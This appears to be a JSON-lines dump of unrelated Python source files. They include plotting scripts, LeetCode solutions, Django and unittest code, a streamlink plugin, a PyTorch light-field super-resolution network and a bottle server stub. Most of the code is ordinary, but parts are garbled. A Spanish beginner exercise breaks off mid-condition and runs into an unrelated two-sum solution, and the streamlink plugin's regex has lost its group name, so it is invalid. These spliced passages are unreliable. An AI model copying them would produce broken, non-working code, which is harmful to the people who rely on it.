circle.pack(circles, 0.1/i, 2, dragged)\r\n\r\n surface.blit(drawsurf, (0, 0))\r\n pygame.display.flip()\r\n\r\nsetup()\r\ncircle.setup(SCREEN_WIDTH, SCREEN_HEIGHT)\r\nrun()\r\n","repo_name":"shedskin/shedskin","sub_path":"examples/circle/circle_main.py","file_name":"circle_main.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":721,"dataset":"github-code","pt":"31"} +{"seq_id":"14496625959","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport DFEC\n\nsample1 = np.load('sample1.npz')\nsample2 = np.load('sample2.npz')\nsample3 = np.load('sample3.npz')\nsample4 = np.load('sample4.npz')\nsample5 = np.load('sample5.npz')\nsample6 = np.load('sample6.npz')\nsample7 = np.load('sample7.npz')\nsample8 = np.load('sample8.npz')\nsample9 = np.load('sample9.npz')\nsample10 = np.load('sample10.npz')\nsample11 = np.load('sample11.npz')\n\nx1 = sample1['arr_0']\nx2 = sample2['arr_0']\nx3 = sample3['arr_0']\nx4 = sample4['arr_0']\nx5 = sample5['arr_0']\nx6 = sample6['arr_0']\nx7 = sample7['arr_0']\nx8 = sample8['arr_0']\nx9 = sample9['arr_0']\nx10 = sample10['arr_0']\nx11 = sample11['arr_0']\n\ntime1 = [x1,x3,x7,x9]\ntime2 = [x5,x10]\nx_axis = np.arange(256) * .05\n\ndef timeplot1():\n\tn = 1\n\tfor item in time1:\n\t\tif n < 3:\n\t\t\tm = 4*n - 2\n\t\telse:\n\t\t\tm = 4*n + 2\n\t\tplt.subplot(2,2,n)\n\t\tplt.plot(x_axis,item)\n\t\tplt.title(r'$\\nu_{sig} =$'+str(m)+'MHz',fontsize=14)\n\t\tplt.xlabel(r'Time ($\\mu{s}$)')\n\t\tplt.ylabel('Voltage (V)')\n\t\tplt.xlim(0,12.8)\n\t\tn = n+1\n\nplt.figure(1)\ntimeplot1()\nplt.tight_layout()\nplt.show()\n \ndef timeplot2():\n\tn = 1\n\tfor item in time2:\n\t\tm = 10*n\n\t\tplt.subplot(2,1,n)\n\t\tplt.plot(x_axis,item)\n\t\tplt.title(r'$\\nu_{sig} =$'+str(m)+'MHz',fontsize=14)\n\t\tplt.xlabel(r'Time ($\\mu{s}$)')\n\t\tplt.ylabel('Voltage (V)')\n\t\tplt.xlim(0,12.8)\n\t\tn = n+1\n\t\nplt.figure(2)\ntimeplot2()\nplt.tight_layout()\nplt.show()\n\ndef timeplot3():\n\tplt.plot(x_axis,x11)\n\tplt.title(r'$\\nu_{sig} = 30 MHz, \\nu_{samp} = 100 kHz$',fontsize=14)\n\tplt.xlabel(r'Time ($\\mu{s}$)')\n\tplt.ylabel('Voltage (V)')\n\nplt.figure(3)\ntimeplot3()\nplt.tight_layout()\nplt.show()\n\t\n","repo_name":"rgao/berkeley","sub_path":"ugastro/digital/timesample.py","file_name":"timesample.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73229005209","text":"# Escribir un programa en el cual: dada una lista de tres valores numéricos distintos se\n# calcule e informe su rango de variación (debe mostrar el mayor y el menor de ellos)\n\nnumero1=int(input(\"Ingrese el primer número: \"))\nnumero2=int(input(\"Ingrese el segundo número: \"))\nnumero3=int(input(\"Ingrese el tercer número: \"))\n\nif numero1>numero2 and numero2>numero3:\n mayor=numero1\nelif numero2>numero1 and numero2>numero3:\n mayor=numero2\nelse:\n mayor=numero3\n\nif numero1 target:\n end -= 1\n elif sum < target:\n start += 1\n else:\n return [start+1, end+1]\n \n return []\n","repo_name":"rahulkumar1m/LeetCode-python","sub_path":"Easy-tagged/Two-Sum-II-Input-array-sorted.py","file_name":"Two-Sum-II-Input-array-sorted.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42299704514","text":"#list of numbers\ninp = True\nlist1=[]\nwhile(inp):\n x =input('Enter the element to list')\n if(x.__eq__(\"No\")):\n break\n list1.append(x)\nlist2 =[list1[0],list1[list1.__len__()-1]]\nprint(list1)\nprint(list2)","repo_name":"sudheesha93/Python_InClassExercise","sub_path":"ICE2/Source/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5704613651","text":"import unittest\r\n\r\nfrom core.data_handlers.RatingsTable import RatingsTable\r\nfrom core.data_handlers.SongTable import SongTable\r\nfrom core.data_handlers.UserTable import UserTable\r\nfrom parameterized import parameterized\r\nfrom exceptions.ColumnValueException import ColumnValueNotExistException\r\n\r\n\r\nclass RatingsTableTest(unittest.TestCase):\r\n\r\n def tearDown(self):\r\n self.ratings.drop()\r\n self.users.drop()\r\n self.songs.drop()\r\n\r\n def setUp(self):\r\n self.users = UserTable()\r\n self.users.add('Pietro', 'Ciccio1', 'pietro.m.96@gmail.com', 'Italy')\r\n self.users.add('Pierre', 'Ciccio2', 'pierre.m.96@gmail.com', 'France')\r\n self.songs = SongTable('../sources/processed_data/spotify_music/SpotifyFeatures.csv')\r\n self.ratings = RatingsTable()\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_07', 'U-0000', '0BjC1NfoEOOusryehmNudP', 1, 1),\r\n ('RatingsTableTest_Test_08', 'U-0000', '0CoSDzoNIKCRs124s9uTVy', 2, 2)\r\n ])\r\n def test_add_rating(self, _, test_user_id, test_song_id, test_rating, expected):\r\n self.assertEqual(expected, self.ratings.add(test_user_id, test_song_id, test_rating))\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_09', 'U-0001', '0BjC1NfoEOOusryehmNu11', 1, ColumnValueNotExistException)\r\n ])\r\n @unittest.skip('Exception no more raised')\r\n def test_add_rating2(self, _, test_user_id, test_song_id, test_rating, test_exception):\r\n self.assertRaises(test_exception, self.ratings.add, test_user_id, test_song_id, test_rating)\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_10', 'U-0000', '0BjC1NfoEOOusryehmNudP', 2, 2),\r\n ('RatingsTableTest_Test_11', 'U-0000', '0CoSDzoNIKCRs124s9uTVy', 3, 3)\r\n ])\r\n def test_update_rating(self, _, test_user_id, test_song_id, test_rating, expected):\r\n self.ratings.add(test_user_id, test_song_id, 1)\r\n self.ratings.update(test_user_id, test_song_id, test_rating)\r\n actual = self.ratings.search((('ratings',), [('user_id', '=', test_user_id), 'AND',\r\n ('song_id', '=', test_song_id)]))\r\n self.assertEqual(expected, actual)\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_12', 'U-0001', '0BRjO6ga9RKCKjfDqeFg11', 1, ColumnValueNotExistException)\r\n ])\r\n @unittest.skip('Exception no more raised')\r\n def test_update_rating2(self, _, test_user_id, test_song_id, test_rating, test_exception):\r\n self.ratings.add(test_user_id, test_song_id, 1)\r\n self.assertRaises(test_exception, self.ratings.update, test_user_id, test_song_id, test_rating)\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"wilsonjefferson/DSSC_IR","sub_path":"tests/RatingsTableTest.py","file_name":"RatingsTableTest.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12257464579","text":"from django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.shortcuts import render, redirect\nfrom project.forms import StaffPermissionForm\nfrom django.contrib.auth.models import User, Permission\n\n\n# personel yetki düzenleme\n@login_required\ndef edit_permissions(request, pk=None):\n # Bir kullanıcıya bir bayi ve distribütörde yetki verildiğinde. Diğerlerinde de aynı yetkiye sahip oluyor.\n # Bunun için yeni bir tablo oluşturulmalı ve object id si ile birlikte orada tutulmalı.\n # Bu kursumuzda bunun örneğini yapmayacağız. Siz isterseniz örnek olması açısından yapabilirsiniz.\n # Eğer yapmak istiyorsanız ileriki derslerde benzer yapılar kuracağız ve bilgi birikimi artacak.\n # Bittiğinde yapmaya çalışmanızı tavsiye ederim.\n\n # Burası için yetki sorgulaması yok herkes istediği kullanıcının ayarlarını değiştirebiliyor.\n role_page = request.session.get('role_page', False)\n instance = User.objects.get(pk=pk)\n\n if request.method == 'POST':\n form = StaffPermissionForm(request.POST)\n\n if form.is_valid():\n # Product Permission\n product_permission = form.cleaned_data['product_permission']\n product_db_permission = Permission.objects.get(codename='manage_product')\n if product_permission:\n instance.user_permissions.add(product_db_permission)\n else:\n instance.user_permissions.remove(product_db_permission)\n\n # Order Permission\n order_permission = form.cleaned_data['order_permission']\n order_db_permission = Permission.objects.get(codename='manage_order')\n if order_permission:\n instance.user_permissions.add(order_db_permission)\n else:\n instance.user_permissions.remove(order_db_permission)\n\n # Payment Permission\n payment_permission = form.cleaned_data['payment_permission']\n payment_db_permission = Permission.objects.get(codename='manage_payment')\n if payment_permission:\n instance.user_permissions.add(payment_db_permission)\n else:\n instance.user_permissions.remove(payment_db_permission)\n\n if role_page == 'distributor':\n # Dealer Permission\n dealer_permission = form.cleaned_data['dealer_permission']\n dealer_db_permission = Permission.objects.get(codename='manage_dealer')\n if dealer_permission:\n instance.user_permissions.add(dealer_db_permission)\n else:\n instance.user_permissions.remove(dealer_db_permission)\n\n return redirect('list-staff')\n else:\n\n product_permission = instance.has_perm('project.manage_product')\n order_permission = instance.has_perm('project.manage_order')\n payment_permission = instance.has_perm('project.manage_payment')\n dealer_permission = instance.has_perm('project.manage_dealer')\n\n form = StaffPermissionForm(initial={'product_permission': product_permission,\n 'dealer_permission': dealer_permission,\n 'order_permission': order_permission,\n 'payment_permission': payment_permission})\n\n if role_page == 'dealer':\n del form.fields['dealer_permission']\n\n return render(request, 'project/accounts/edit_permissions.html', {'form': form})\n","repo_name":"educatecomtr/stocks","sub_path":"project/views/accounts/edit_staff_permissions.py","file_name":"edit_staff_permissions.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70484427927","text":"if __name__ == \"__main__\":\n import os\n import glob\n\n datapath = []\n if \"textbook\" in glob.glob(\"*\"):\n datapath.append(\"textbook\")\n datapath.append(\"data\")\n elif len(glob.glob(\"*.py\")) > 0:\n datapath.extend([\"..\", \"..\", \"data\"])\n datapath = os.path.join(*datapath)\n\n path = os.path.join(datapath, \"rosalind_ba3e.txt\")\n if os.path.exists(path):\n with open(path) as f:\n patterns = f.readlines()\n patterns = [p.strip() for p in patterns]\n\n\ndef debruijn_from_kmers(patterns):\n # given a collection of k-mers, the nodes are simply all unique (k-1)-mers that are a prefix or suffix of any k-mer\n k = len(patterns[0]) - 1\n nodes = set()\n for p in patterns:\n nodes.add(p[1:])\n nodes.add(p[:k])\n\n # for every k-mer, we connect the prefix node and suffix node by a directed edge\n edges = {node: [] for node in nodes}\n for p in patterns:\n edges[p[:k]].append(p[1:])\n\n # create print format of adjacency list\n adjacency_list = []\n for node in edges:\n if len(edges[node]) > 0:\n adjacency_list.append(node + \" -> \" + \",\".join(edges[node]))\n\n return adjacency_list\n\n\n# print(debruijn_from_kmers(['GAGG','CAGG','GGGG','GGGA','CAGG','AGGG','GGAG']))\n\n# write to output file\nwith open(os.path.join(datapath, \"rosalind_ba3e_output.txt\"), \"w\") as outputfile:\n outputfile.write(\"\\n\".join(debruijn_from_kmers(patterns)))\n","repo_name":"Bennibraun/Rosalind-Projects","sub_path":"textbook/scripts/3/BA3E.py","file_name":"BA3E.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8421594517","text":"# date: 27/jun/20\n# 1491. Average Salary Excluding the Minimum and Maximum Salary\n# Easy\n\n# 22\n\n# 2\n\n# Add to List\n\n# Share\n# Given an array of unique integers salary where salary[i] is the salary of the employee i.\n\n# Return the average salary of employees excluding the minimum and maximum salary.\n\n \n\n# Example 1:\n\n# Input: salary = [4000,3000,1000,2000]\n# Output: 2500.00000\n# Explanation: Minimum salary and maximum salary are 1000 and 4000 respectively.\n# Average salary excluding minimum and maximum salary is (2000+3000)/2= 2500\n# Example 2:\n\n# Input: salary = [1000,2000,3000]\n# Output: 2000.00000\n# Explanation: Minimum salary and maximum salary are 1000 and 3000 respectively.\n# Average salary excluding minimum and maximum salary is (2000)/1= 2000\n# Example 3:\n\n# Input: salary = [6000,5000,4000,3000,2000,1000]\n# Output: 3500.00000\n# Example 4:\n\n# Input: salary = [8000,9000,2000,3000,6000,1000]\n# Output: 4750.00000\n\nclass Solution(object):\n def average(self, salary):\n \"\"\"\n :type salary: List[int]\n :rtype: float\n \"\"\"\n minm = min(salary)\n maxm = max(salary)\n \n salary.remove(minm)\n salary.remove(maxm)\n \n return sum(salary)/float(len(salary))\n ","repo_name":"viveksumanth/Code-Everyday","sub_path":"june 20/1491.py","file_name":"1491.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25010654874","text":"import logging\nimport re\n\nfrom streamlink.plugin import Plugin\nfrom streamlink.plugin.api import useragents, validate\nfrom streamlink.stream import HLSStream, HTTPStream, RTMPStream\n\nlog = logging.getLogger(__name__)\n\n\nclass App17(Plugin):\n _url_re = re.compile(r\"https://17.live/live/(?P[^/&?]+)\")\n API_URL = \"https://api-dsa.17app.co/api/v1/lives/{0}/viewers/alive\"\n\n _api_schema = validate.Schema(\n {\n \"rtmpUrls\": [{\n validate.optional(\"provider\"): validate.any(int, None),\n \"url\": validate.url(),\n }],\n },\n validate.get(\"rtmpUrls\"),\n )\n\n @classmethod\n def can_handle_url(cls, url):\n return cls._url_re.match(url) is not None\n\n def _get_streams(self):\n match = self._url_re.match(self.url)\n channel = match.group(\"channel\")\n\n self.session.http.headers.update({'User-Agent': useragents.CHROME, 'Referer': self.url})\n\n data = '{\"liveStreamID\":\"%s\"}' % (channel)\n\n try:\n res = self.session.http.post(self.API_URL.format(channel), data=data)\n res_json = self.session.http.json(res, schema=self._api_schema)\n log.trace(\"{0!r}\".format(res_json))\n http_url = res_json[0][\"url\"]\n except Exception as e:\n log.info(\"Stream currently unavailable.\")\n log.debug(str(e))\n return\n\n https_url = http_url.replace(\"http:\", \"https:\")\n yield \"live\", HTTPStream(self.session, https_url)\n\n if 'pull-rtmp' in http_url:\n rtmp_url = http_url.replace(\"http:\", \"rtmp:\").replace(\".flv\", \"\")\n stream = RTMPStream(self.session, {\n \"rtmp\": rtmp_url,\n \"live\": True,\n \"pageUrl\": self.url,\n })\n yield \"live\", stream\n\n if 'wansu-' in http_url:\n hls_url = http_url.replace(\".flv\", \"/playlist.m3u8\")\n else:\n hls_url = http_url.replace(\"live-hdl\", \"live-hls\").replace(\".flv\", \".m3u8\")\n\n s = HLSStream.parse_variant_playlist(self.session, hls_url)\n if not s:\n yield \"live\", HLSStream(self.session, hls_url)\n else:\n if len(s) == 1:\n for _n, _s in s.items():\n yield \"live\", _s\n else:\n yield from s.items()\n\n\n__plugin__ = App17\n","repo_name":"Tup0lev/BiliBili_Global_Streaming_Projet_Katyusha","sub_path":"packages/streamlink/plugins/app17.py","file_name":"app17.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"40209980793","text":"import torch\r\nimport torch.nn as nn\r\nfrom common import *\r\nfrom readH5 import *\r\nfrom utils import * \r\nimport torch.nn.functional as F\r\n\r\nclass Net(nn.Module):\r\n\tdef __init__(self, angRes, channels, factor):\r\n\t\tsuper(Net, self).__init__()\r\n\t\t\r\n\t\tn_blocks = 15\r\n\t\tself.angRes = angRes\r\n\t\tself.upscale_factor = factor\r\n\t \r\n\t\tself.HFEM_1 = HFEM(angRes, n_blocks, channels,first=True)\r\n\t\tself.HFEM_2 = HFEM(angRes, n_blocks, channels,first=False)\r\n\t\tself.HFEM_3 = HFEM(angRes, n_blocks, channels,first=False)\r\n\t\tself.HFEM_4 = HFEM(angRes, n_blocks, channels,first=False)\r\n\t\tself.HFEM_5 = HFEM(angRes, n_blocks, channels,first=False)\r\n\r\n\t\t# define tail module for upsamling\r\n\t\tUpSample = [\r\n\t\t\tUpsampler(self.upscale_factor, channels,kernel_size=3, stride =1,dilation=1, padding=1, act=False),\r\n\t\t\tnn.Conv2d(channels, 1, kernel_size=1,stride =1,dilation=1,padding=0,bias=False)]\r\n\t\r\n\t\tself.UpSample = nn.Sequential(*UpSample)\r\n\t\t\r\n\r\n\tdef forward(self, x):\r\n\t\t\r\n\t\t#Reshaping and Upscaling\r\n\t\tx_reshaping = MacPI2SAI(x,self.angRes)\r\n\t\tx_upscale = F.interpolate(x_reshaping, scale_factor=self.upscale_factor, mode='bicubic', align_corners=False)\r\n\r\n\t\tHFEM_1 = self.HFEM_1(x)\r\n\t\tHFEM_2 = self.HFEM_2(HFEM_1)\r\n\t\tHFEM_3 = self.HFEM_3(HFEM_2)\r\n\t\tHFEM_4 = self.HFEM_4(HFEM_3)\r\n\t\tHFEM_5 = self.HFEM_5(HFEM_4)\r\n\r\n\t\t#Reshaping\r\n\t\tx_out = MacPI2SAI(HFEM_5,self.angRes)\r\n\t\tx_out= self.UpSample(x_out)\r\n\r\n\t\tx_out += x_upscale\r\n\r\n\t\treturn x_out\r\n\r\n\r\nclass HFEM(nn.Module):\r\n\tdef __init__(self, angRes, n_blocks, channels,first=False):\r\n\t\tsuper(HFEM, self).__init__()\r\n\t\t\r\n\t\tself.first = first \r\n\t\tself.n_blocks = n_blocks\r\n\t\tself.angRes = angRes\r\n\r\n\t\t# define head module epi feature\r\n\t\thead_epi = []\r\n\t\tif first: \r\n\t\t\thead_epi.append(nn.Conv2d(angRes, channels, kernel_size=3, stride=1, padding=1, bias=False))\r\n\t\telse:\r\n\t\t\thead_epi.append(nn.Conv2d(angRes*channels, channels, kernel_size=3, stride=1, padding=1, bias=False))\r\n\r\n\t\tself.head_epi = nn.Sequential(*head_epi)\r\n\r\n\t\tself.epi2spa = nn.Sequential(\r\n\t\t\tnn.Conv2d(4*channels, int(angRes * angRes * channels), kernel_size=1, stride=1, padding=0, bias=False),\r\n\t\t\tnn.PixelShuffle(angRes),\r\n\t\t)\r\n\r\n\r\n\t\t# define head module intra spatial feature\r\n\t\thead_spa_intra = []\r\n\t\tif first: \r\n\t\t\thead_spa_intra.append(nn.Conv2d(1 ,channels, kernel_size=3, stride=1,dilation=int(angRes), padding=int(angRes), bias=False))\r\n\t\t\t\r\n\t\telse:\r\n\t\t\thead_spa_intra.append(nn.Conv2d(channels ,channels, kernel_size=3, stride=1,dilation=int(angRes), padding=int(angRes), bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_spa_intra = nn.Sequential(*head_spa_intra)\r\n\r\n\r\n\t\t# define head module inter spatial feature\r\n\t\thead_spa_inter = []\r\n\t\tif first: \r\n\t\t\thead_spa_inter.append(nn.Conv2d(1 ,channels, kernel_size=3, stride=1,dilation=1, padding=1, bias=False))\r\n\t\telse:\r\n\t\t\thead_spa_inter.append(nn.Conv2d(channels ,channels, kernel_size=3, stride=1,dilation=1, padding=1, bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_spa_inter = nn.Sequential(*head_spa_inter)\r\n\r\n\t\t\r\n\r\n\t\t# define head module intra angular feature\r\n\t\thead_ang_intra = []\r\n\t\tif first: \r\n\t\t\thead_ang_intra.append(nn.Conv2d(1 ,channels, kernel_size=int(angRes), stride = int(angRes), dilation=1, padding=0, bias=False))\r\n\r\n\t\telse:\r\n\t\t\thead_ang_intra.append(nn.Conv2d(channels ,channels, kernel_size=int(angRes), stride = int(angRes), dilation=1, padding=0, bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_ang_intra = nn.Sequential(*head_ang_intra)\r\n\r\n\t\tself.ang2spa_intra = nn.Sequential(\r\n\t\t\tnn.Conv2d(channels, int(angRes * angRes * channels), kernel_size=1, stride=1, padding=0, bias=False),\r\n\t\t\tnn.PixelShuffle(angRes), \r\n\t\t)\r\n\r\n\r\n\t\t# define head module inter angular feature\r\n\t\thead_ang_inter = []\r\n\t\tif first: \r\n\t\t\thead_ang_inter.append(nn.Conv2d(1 ,channels, kernel_size=int(angRes*2), stride = int(angRes*2), dilation=1, padding=0, bias=False))\r\n\r\n\t\telse:\r\n\t\t\thead_ang_inter.append(nn.Conv2d(channels ,channels, kernel_size=int(angRes*2), stride = int(angRes*2), dilation=1, padding=0, bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_ang_inter = nn.Sequential(*head_ang_inter)\r\n\r\n\t\t\t\r\n\t\tself.ang2spa_inter = nn.Sequential(\r\n\t\t\tnn.Conv2d(channels, int(4*angRes * angRes * channels), kernel_size=1, stride=1, padding=0, bias=False),\r\n\t\t\tnn.PixelShuffle(2*angRes),\r\n\t\t)\r\n\r\n\t\t# define module attention fusion feature\r\n\t\tself.attention_fusion = AttentionFusion(channels)\r\n\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t# define module spatial residual group\r\n\t\tself.SRG = nn.Sequential( nn.Conv2d(5*channels, channels, kernel_size=1,stride =1,dilation=1,padding=0, bias=False),\r\n\t\t ResidualGroup(self.n_blocks, channels,kernel_size=3,stride =1,dilation=int(angRes), padding=int(angRes), bias=False))\r\n\r\n\r\n\tdef forward(self, x):\r\n\r\n\t\t# MO-EPI feature extractor\r\n\t\tdata_0, data_90, data_45, data_135 = MacPI2EPI(x,self.angRes)\r\n\r\n\t\tdata_0 = self.head_epi(data_0)\r\n\t\tdata_90 = self.head_epi(data_90)\r\n\t\tdata_45 = self.head_epi(data_45)\r\n\t\tdata_135 = self.head_epi(data_135)\r\n\t\r\n\t\tmid_merged = torch.cat((data_0, data_90, data_45, data_135), 1)\r\n\t\tx_epi = self.epi2spa(mid_merged)\r\n\r\n\r\n\t\t# intra/inter spatial feature extractor\r\n\t\tx_s_intra = self.head_spa_intra(x)\r\n\t\tx_s_inter = self.head_spa_inter(x)\r\n\t\r\n\t\t# intra/inter angular feature extractor\r\n\t\tx_a_intra = self.head_ang_intra(x)\r\n\t\tx_a_intra = self.ang2spa_intra(x_a_intra)\r\n\r\n\t\tx_a_inter = self.head_ang_inter(x)\r\n\t\tx_a_inter = self.ang2spa_inter(x_a_inter)\r\n\r\n\t\t# fusion feature and refinement\r\n\t\tout = x_s_intra.unsqueeze(1)\r\n\t\tout = torch.cat([x_s_inter.unsqueeze(1),out],1)\r\n\t\tout = torch.cat([x_a_intra.unsqueeze(1),out],1)\r\n\t\tout = torch.cat([x_a_inter.unsqueeze(1),out],1)\r\n\t\tout = torch.cat([x_epi.unsqueeze(1),out],1)\r\n\r\n\t\tout,att_weight = self.attention_fusion(out)\r\n\r\n\t\tout = self.SRG(out)\r\n\r\n\t\treturn out\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n net = Net(5,32, 2).cuda()\r\n from thop import profile\r\n input = torch.randn(1, 1, 160, 160).cuda()\r\n total = sum([param.nelement() for param in net.parameters()])\r\n flops, params = profile(net, inputs=(input,))\r\n print(' Number of parameters: %.2fM' % (total / 1024**2))\r\n print(' Number of FLOPs: %.2fG' % (flops / 1024**3))\r\n","repo_name":"duongvinh/HLFSR-SSR","sub_path":"code/model_HLFSR.py","file_name":"model_HLFSR.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"15527538697","text":"# user_profile\n\ndef build_profile(first, last, **user_info):\n profile = {}\n profile['first_name'] = first\n profile['last_name'] = last\n for key, value in user_info.items():\n profile[key] = value\n return profile\n\nuser_profile = build_profile('Rodrigo', 'Lourenco',\nlocation='Krakow',\nfield='Engineering')\nprint(user_profile)","repo_name":"panlourenco/exercises-coronapython","sub_path":"chapter_08/chapter_8_8_13.py","file_name":"chapter_8_8_13.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9033386510","text":"import sox\nimport numpy as np\nfrom typing import List\nfrom audio.audio_array import AudioArray\nfrom audio.audio_source import AudioSource\n\n# yaml object\n# ---\n# type: Combiner\n# combine_type: 'mix-power' # or... concatenate merge mix multiply see https://pysox.readthedocs.io/en/latest/api.html#sox.combine.Combiner.build\n# inputs:\n# - type: AudioFile\n# filepath: audio.mp3\n# - type: Phaser\n# input:\n# type: AudioFile\n# filepath: audio.mp3\n# gain_in: 0.8\n# gain_out: 0.74\n# delay: 3\n# decay: 0.4\n# speed: 0.5\n# modulation_shape: sinusoidal # or triangular\n# - type: Pitch\n# input:\n# type: AudioFile\n# filepath: audio.mp3\n# amount: 1\n\nclass Combiner(AudioSource):\n def __init__(self, inputs: List[AudioSource], combine_type: str='mix-power') -> None:\n super().__init__()\n self.__inputs = inputs\n self.__combine_type = combine_type\n\n def get_array(self) -> AudioArray:\n combiner = sox.Combiner()\n input_files = [input.get_temp_file() for input in self.__inputs]\n combiner.build(\n input_filepath_list=input_files, \n output_filepath=self._temp_filepath, \n combine_type=self.__combine_type\n )\n return AudioArray(\n array=sox.Transformer().build_array(input_filepath=self._temp_filepath),\n sample_rate=sox.file_info.sample_rate(input_filepath=self._temp_filepath)\n )\n\n","repo_name":"MadLadLabs/audio-pipe","sub_path":"src/audio/combiner.py","file_name":"combiner.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26217238408","text":"import os\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import model_selection\nimport cv2\n\n\ndef preprocess_image(image):\n\n image = image[70:140,:,:]\n image = cv2.resize(image,(128,32))\n\n return image\n\n\ndef get_csv_data():\n\n CENTER,LEFT,RIGHT,STEERING,THROTTLE,BRAKE,SPEED=range(7)\n\n driving_log = pd.io.parsers.read_csv('./SimulatorTraining/driving_log.csv').as_matrix()\n\n count = len(driving_log)\n ileft = np.random.choice(count,count//2,replace=False)\n iright = np.random.choice(count,count//2,replace=False)\n\n data=driving_log[:,[CENTER,STEERING,THROTTLE,BRAKE,SPEED]]\n\n left_data=driving_log[:,[LEFT,STEERING,THROTTLE,BRAKE,SPEED]] [ileft , :]\n right_data=driving_log[:,[RIGHT,STEERING,THROTTLE,BRAKE,SPEED]] [iright , :]\n\n left_data[:,[STEERING]]=left_data[:,[STEERING]] + 0.25\n right_data[:,[STEERING]]=right_data[:,[STEERING]] - 0.25\n\n data=np.concatenate( (data,left_data) )\n data=np.concatenate( (data,right_data) )\n\n np.random.shuffle(data)\n\n train, valid = model_selection.train_test_split(data, test_size=.2)\n\n return train,valid\n\n\ndef get_batch_data(batch):\n IMG,STEERING,THROTTLE,BRAKE,SPEED=range(5)\n x,y = [],[]\n for row in batch:\n image = preprocess_image(plt.imread( \"SimulatorTraining/\" + row[IMG]))\n angle = row[STEERING]\n x.append( image )\n y.append( angle )\n x.append( image[:,::-1,:] )\n y.append( -1 * angle )\n\n return np.array(x),np.array(y)\n\ndef generate_samples(data,batch_size=128):\n while True:\n for bnext in range(0, len(data), batch_size):\n batch=data[bnext:bnext+batch_size]\n x,y=get_batch_data(batch)\n yield (x,y)\n\n","repo_name":"praveenmarothu/P3-Behavioral-Cloning","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12723590378","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#################### СЧИТЫВАНИЕ ДАННЫХ #################################\nvoltage = []\ndata = np.loadtxt('data.txt', dtype = int)\nvoltage = [i / 256 *3.3 for i in data] \nwith open('settings.txt', mode = 'r') as settings:\n frequency = float(settings.read().split('\\n')[0])\n\nx = np.linspace(0, len(voltage)*frequency, len(voltage))\nvoltage = np.array(voltage)\nmax_elem_id = np.argmax(voltage)\nzaryad = frequency * (max_elem_id + 1)\nrazryad = frequency * (len(voltage) - 1 - max_elem_id)\ntime = frequency * len(voltage)\n################## НАСТРОЙКА ОТОБРАЖЕНИЯ ГРАФИКА ########################\ntitle = 'Процеcc зарядки и разрядки конденсатора в RC-цепи'\n\nfig, ax = plt.subplots()\nax.plot(x, voltage, 'g.-', label = 'V (t)')\nax.text(0.75 * time, 2, f'Время заряда = {zaryad} c.',\n fontsize = 11,\n color = 'r',\n wrap = True)\nax.text(0.75 * time , 1.5, f'Время разряда = {razryad} c.',\n fontsize = 11,\n color = 'r',\n wrap = True)\nax.minorticks_on()\nax.grid(which = 'major',\n color = 'k',\n linewidth = 1)\nax.grid(which = 'minor',\n color = 'k',\n linestyle = ':')\nax.set(xlim = (x.min(), x.max()), ylim = (voltage.min(), voltage.max()))\nplt.title(title, wrap = True)\nfig.set_figwidth(12)\nfig.set_figheight(8)\nplt.xlabel('Время,с ')\nplt.ylabel('Показания ADC, Вольт')\nplt.legend()\nplt.show()\nfig.savefig('graph.svg')\nfig.savefig('graph.png')","repo_name":"yavnolib/graph_oip","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13055504192","text":"# coding=utf-8\nfrom STULogin import STULogin\nfrom bottle import *\nimport json\nimport BooksAPI\nimport os\nimport time\nfrom BookRetrieval import BookRetrieval\n\ndef returnJSON(code,data):\n return json.dumps({\n \"error_code\":code,\n \"data\" : data\n }\n )\n\n@get(\"/\")\ndef index():\n # print(os.curdir)\n return 